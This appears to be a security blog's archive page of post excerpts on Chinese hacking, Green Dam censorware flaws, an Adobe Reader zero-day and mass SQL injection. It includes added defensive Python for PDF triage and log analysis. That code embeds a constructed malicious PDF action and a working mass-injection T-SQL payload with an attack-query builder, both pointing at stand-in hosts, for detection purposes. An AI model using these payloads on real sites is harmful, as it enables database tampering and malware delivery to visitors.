Category: People's Republic of China
November 9th, 2009
CBS 60 Minutes tackles cyber-terrorism
Could hackers get into the computer systems that run crucial elements of the world’s infrastructure, such as the power grids, water works or even a nation’s military arsenal? Watch the CBS News 60 Minutes segment after the jump.
September 29th, 2009
Chinese hackers launch targeted attacks against foreign correspondents
According to an assessment published by the Information Warfare Monitor, Chinese hacktivists (politically motivated hackers) have recently launched a targeted malware attack against foreign news correspondents, attempting to trick them into opening a malware-embedded PDF attachment (Interview list.pdf) that purports to come from a non-existent editor at The Straits Times.
The attacks coincide with the upcoming nation-wide celebration of the 60th anniversary of the PRC, and appear to be directly connected to the GhostNet cyber espionage network exposed earlier this year.
Key findings of the assessment include:
July 23rd, 2009
China's Green Dam and the cyberwar implications
Guest editorial by Oliver Day
Chinese military leaders have always been aware of the military advantage the US has over the People’s Liberation Army. Reading through their published assessments of Sino-US war possibilities confirms our belief that we would dominate them in the air, on land and at sea. However, the PLA was born of asymmetric warfare and this remains a core part of their strategies for any possible war with the US. Specifically, the PLA writes about the use of cyberwarfare as a means of countering this imbalance.
June 24th, 2009
Remote code execution exploit for Green Dam in the wild
Green Dam, the Chinese censorware recently shown to contain trivially exploitable remote flaws, has been silently patched to address the vulnerabilities outlined in the original analysis (China confirms security flaws in Green Dam, rushes to release a patch).
However, not only is the latest version, Green Dam v3.17, still vulnerable to remotely exploitable flaws, but a working zero day exploit (Exploit.GreenDam!IK; W32/GreenDam.A) has also been circulating in the wild for over a week now.
Here are more details on the remote code execution flaw in the latest version:
June 15th, 2009
China confirms security flaws in Green Dam, rushes to release a patch
China’s Ministry of Industry and Information Technology has instructed the developers of the Green Dam censorware to promptly release a patch in response to last week’s published analysis detailing the possibility of remotely exploitable vulnerabilities within the software.
Jinhui Computer System Engineering Co, the developer of Green Dam, insisted that the software is just as vulnerable as any other, and that its expertise lies in coding Internet filtering software rather than in security; an interesting comment, given that the developer earned millions in the process of coding it.
May 13th, 2009
China's 'secure' OS Kylin - a threat to U.S. offensive cyber capabilities?
Picture a cyber warfare arms race in which the participating countries have spent years building offensive cyber warfare capabilities by exploiting the software monoculture of one another’s IT infrastructure.
Suddenly, one of the countries starts migrating to a hardened operating system of its own and deploys it on the systems managing its critical infrastructure, undermining the offensive capabilities that its adversaries developed primarily for use against Linux, UNIX and Windows.
That’s exactly what China is doing right now with its hardened OS Kylin, according to Kevin G. Coleman, Senior Fellow and Strategic Management Consultant with the Technolytics Institute, who presented his viewpoint in a hearing at the U.S.-China Economic and Security Review Commission.
Here’s an excerpt from the hearing:
February 23rd, 2009
eBay solutions provider Auctiva.com infected with malware
eBay solutions provider Auctiva.com suffered a malware attack over the weekend, resulting in a “this site may harm your computer” badware warning that affected hundreds of thousands of customers and their eBay auctions.
Following complaints from users who began receiving antivirus warnings when visiting Auctiva.com, the company took steps to keep the clean-up process transparent, and finalized it yesterday.
According to Auctiva’s update log:
February 23rd, 2009
Chinese hackers deface the Russian Consulate in Shanghai
That was fast. Chinese hackers collaborating with the Chinese Hacking Union, a two-year-old training community for wannabe hackers, hacked and defaced the official web site of the General Consulate of the Russian Federation in Shanghai, PRC, in response to recent accusations that a Russian navy vessel had sunk a Chinese cargo ship.
The message left on the now “under maintenance” site translates as follows:
February 20th, 2009
Adobe Reader 9 and Acrobat 9 zero day exploited in the wild
Yesterday, Adobe confirmed the existence of a critical vulnerability affecting Adobe Reader and Acrobat versions 9.0 and earlier, originally detected by the Shadowserver Foundation last week.
The ongoing targeted attacks have since been confirmed by both Symantec and McAfee, who urge users to disable JavaScript in Adobe Reader and Acrobat until Adobe issues a patch on March 11: click Edit -> Preferences -> JavaScript and uncheck “Enable Acrobat JavaScript”.
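The lure described in the foreign-correspondents entry above (a malware-embedded PDF attachment) and the Reader zero-day described here both depend on a PDF carrying active content, which is exactly why the vendors' interim advice is to switch JavaScript off. As an added example that is not code from the original posts, the Python below performs the first-pass triage an analyst would run on such an attachment before opening it anywhere: inflate Flate-compressed streams, resolve hex-escaped names such as /J#61vaScript (a common trick for hiding /JavaScript from string searches), count action-related names, and pull out inline JavaScript for review. The two sample documents are constructed for this example, and the suspicious-name list and verdict thresholds are choices made here, not a vendor signature set.

```python
import re
import zlib

# Names whose presence in a PDF warrants a closer look: script execution, auto-run
# actions, launching external programs and embedded files. Chosen for this example.
SUSPICIOUS_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA",
                    "/Launch", "/EmbeddedFile", "/RichMedia")


def inflate_streams(data: bytes) -> bytes:
    """Return data followed by the inflated body of every stream zlib can decode,
    so names tucked inside FlateDecode streams are visible to the name scan.
    decompressobj tolerates the trailing newline before 'endstream'."""
    parts = [data]
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", data, re.S):
        try:
            inflated = zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            continue  # not a Flate stream (image or font data); skip it
        if inflated:
            parts.append(inflated)
    return b"\n".join(parts)


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx hex escapes in name objects, so /J#61vaScript reads as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> dict:
    """Count suspicious names; the lookahead stops /JS from matching longer names."""
    text = normalize_names(inflate_streams(data))
    counts = {}
    for name in SUSPICIOUS_NAMES:
        n = len(re.findall(re.escape(name.encode()) + rb"(?![A-Za-z0-9])", text))
        if n:
            counts[name] = n
    return counts


def extract_js(data: bytes) -> list:
    """Pull inline /JS (...) literal strings out for the analyst, unescaping \\( and \\)."""
    text = normalize_names(inflate_streams(data))
    found = re.findall(rb"/JS\s*\(((?:[^()\\]|\\.)*)\)", text)
    return [re.sub(rb"\\(.)", rb"\1", f).decode("latin-1") for f in found]


def verdict(data: bytes) -> str:
    counts = triage_pdf(data)
    if any(counts.get(k) for k in ("/JavaScript", "/JS", "/Launch")):
        return "suspicious"
    return "review" if counts else "clean"


# Constructed sample, not a captured document: the catalog's OpenAction fires a
# JavaScript action whose name is hex-escaped, and a second script sits inside a
# Flate-compressed object where a plain string search would not see it.
_HIDDEN = zlib.compress(b"<< /S /JavaScript /JS (app.alert\\(1\\)) >>")
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"4 0 obj << /S /J#61vaScript /JS (app.launchURL\\('http://example.invalid/'\\)) >> endobj\n"
    b"5 0 obj << /Length " + str(len(_HIDDEN)).encode() + b" /Filter /FlateDecode >>\n"
    + b"stream\n" + _HIDDEN + b"\nendstream\nendobj\n"
    + b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        print(label, verdict(doc), triage_pdf(doc), extract_js(doc))
```

Disabling Acrobat JavaScript, as Symantec and McAfee advise, removes the /JS vector but not /Launch actions or embedded files, which is why the triage keeps flagging those even in a document with no script. Real-world samples also use other filters (ASCIIHex, LZW) and object streams, so treat this as the first pass, not a parser.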
Symantec’s comments on the potential for massive attacks using the exploit:
December 17th, 2008
Thousands of legitimate sites SQL injected to serve IE exploit
Once again confirming the trend of more legitimate sites serving exploits and malware than purely malicious ones, Chinese hackers have kept themselves busy during the last couple of days, launching massive SQL injection attacks affecting over 100,000 web sites.
The SQL injection attacks, which serve the just-patched Internet Explorer XML parsing exploit, are launched by several different Chinese hacking groups and, with a few exceptions, primarily target Asian countries, a logical move given that the payload ultimately served is password-stealing malware for online games.
Which is the most targeted country?
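The mass injections of that period worked by hiding the real T-SQL inside a hex-encoded CAST(0x... AS VARCHAR) so that simple keyword filters on the request never saw "UPDATE" or "<script", then walking every text column in the database and appending a script tag that pointed at the exploit host. As an added example, not code from the original post, the Python below shows the detection side: it decodes the query strings in web server log lines, recovers the hidden statement (handling both VARCHAR and UTF-16 NVARCHAR encodings) and reports the injected script URLs and the mass-update signature. The payload text, hostnames, IP addresses and the log line layout are constructed for this example.

```python
import re
from urllib.parse import quote, unquote_plus

# The hex-CAST wrapper: the statement is opaque until the hex is decoded.
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.I)
SCRIPT_SRC = re.compile(r"<script[^>]*src=[\"']?([^\s\"'>]+)", re.I)


def analyze_request(uri_query: str):
    """Decode a URL-encoded query string and, if it carries a hex CAST payload,
    return the decoded T-SQL plus the script URLs it injects. Returns None otherwise."""
    q = unquote_plus(uri_query)
    m = HEX_CAST.search(q)
    if m is None:
        return None
    try:
        raw = bytes.fromhex(m.group(1))
    except ValueError:  # odd-length or malformed hex: still worth reporting
        return {"decoded": None, "script_sources": [], "mass_update": False}
    # NVARCHAR payloads are UTF-16LE; VARCHAR payloads are single-byte.
    decoded = raw.decode("utf-16-le", "replace") if m.group(2) else raw.decode("latin-1")
    return {
        "decoded": decoded,
        "script_sources": SCRIPT_SRC.findall(decoded),
        # Tell-tale of the mass attack: enumerating sysobjects/syscolumns to UPDATE every text column.
        "mass_update": bool(re.search(r"\bsysobjects\b.*\bUPDATE\b", decoded, re.I | re.S)),
    }


def scan_log(lines):
    """Run analyze_request over log lines laid out as
    'date time c-ip method uri-stem uri-query status' (constructed W3C-style layout)."""
    hits = []
    for line in lines:
        fields = line.split(" ")
        if len(fields) != 7:
            continue
        result = analyze_request(fields[5])
        if result is not None:
            result.update(client=fields[2], path=fields[4], status=fields[6])
            hits.append(result)
    return hits


# Constructed test data, not a captured payload: a cursor over every text column
# appends a script tag to each value, which is how legitimate pages end up serving
# the exploit to every visitor.
_INJECTED_TSQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+"
    "''<script src=http://example.invalid/x.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def _attack_query(sql_type: str, encoding: str) -> str:
    """Build the URL-encoded query string an attacker would send (constructed)."""
    hexed = _INJECTED_TSQL.encode(encoding).hex().upper()
    tail = f"DECLARE @S {sql_type}(4000);SET @S=CAST(0x{hexed} AS {sql_type}(4000));EXEC(@S);--"
    return "id=12;" + quote(tail, safe="")


SAMPLE_LOG = [
    "2008-12-15 10:21:33 198.51.100.23 GET /products.asp id=12 200",
    "2008-12-15 10:21:34 198.51.100.23 GET /products.asp " + _attack_query("VARCHAR", "latin-1") + " 200",
    "2008-12-15 10:21:40 203.0.113.7 GET /news.asp id=3 200",
    "2008-12-15 10:22:01 203.0.113.7 GET /news.asp " + _attack_query("NVARCHAR", "utf-16-le") + " 500",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["path"], hit["status"], hit["script_sources"], hit["mass_update"])
```

The 200 status on the first injected request is the point worth noting: a successful mass UPDATE looks like an ordinary page view in the log, so the decoded script URL, not the status code, is what tells you the site is now serving someone else's content. Parameterised queries remove the injection point entirely; the decoder above is for finding out how long you have been affected.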
Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response. He's been an active security blogger since 2007, and maintains a popular security blog.